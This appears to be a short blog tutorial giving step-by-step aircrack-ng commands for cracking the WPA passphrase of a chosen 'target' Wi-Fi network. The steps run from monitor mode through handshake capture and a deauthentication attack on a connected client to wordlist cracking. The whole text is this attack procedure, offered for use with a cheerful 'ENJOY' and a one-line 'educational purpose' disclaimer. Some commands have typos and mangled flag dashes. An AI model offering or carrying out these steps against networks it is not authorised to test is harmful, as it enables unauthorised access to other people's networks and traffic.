- Download and setup Kali Linux.
- Attack your injection-capable wireless adapter.
- Disconnect from all the wireless networks.
- Open terminal using ctrl+alt+t and type airmon-ng.
- Look for the interface of your wireless card in the list.
- Type airmon-ng start followed by the interface of your wireless card.
- Type ifconfig followed by the interface of your wireless card.
- Type airodump-ng followed by the new monitor interface.
- A list of all all the wireless networks in your area will appear.
- Look for the target network and hit Ctrl + C to stop the process.
- Copy the channel and BSSID of the target network.
- Type this command and replace the values in square brackets "airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [interface]"
- Next, leave airodump-ng running and open a new terminal window.
- Type aireplay-ng –0 2 –a [bssid] –c [STATION bssid] [interface].
- Close the new terminal and switch back to the previous one.
- Now hit Ctrl + C to stop monitoring the target network.
- Type aircrack-ng -a2 -b [bssid] –w /root/wpa.txt /root/Desktop/*.cap
- Cracking password might take a long time depending on the wordlist.
- Now all you need to do is wait for aircrack to do its job.
- That’s all, the passphrase will appear on the screen.
- For Windows Users Download Linux VM FRom Here.
- ENJOY..........
NOTE :- THIS TRICK IS FOR ONLY EDUCATIONAL PURPOSE. DON'T USE IT FOR ILLEGAL PURPOSE......
IF YOU LIKE IT OR YOU HAVE ANY DOUBT YOU CAN LEAVE A REVIEW THROUGH COMMENT.
THANKS FOR READING............




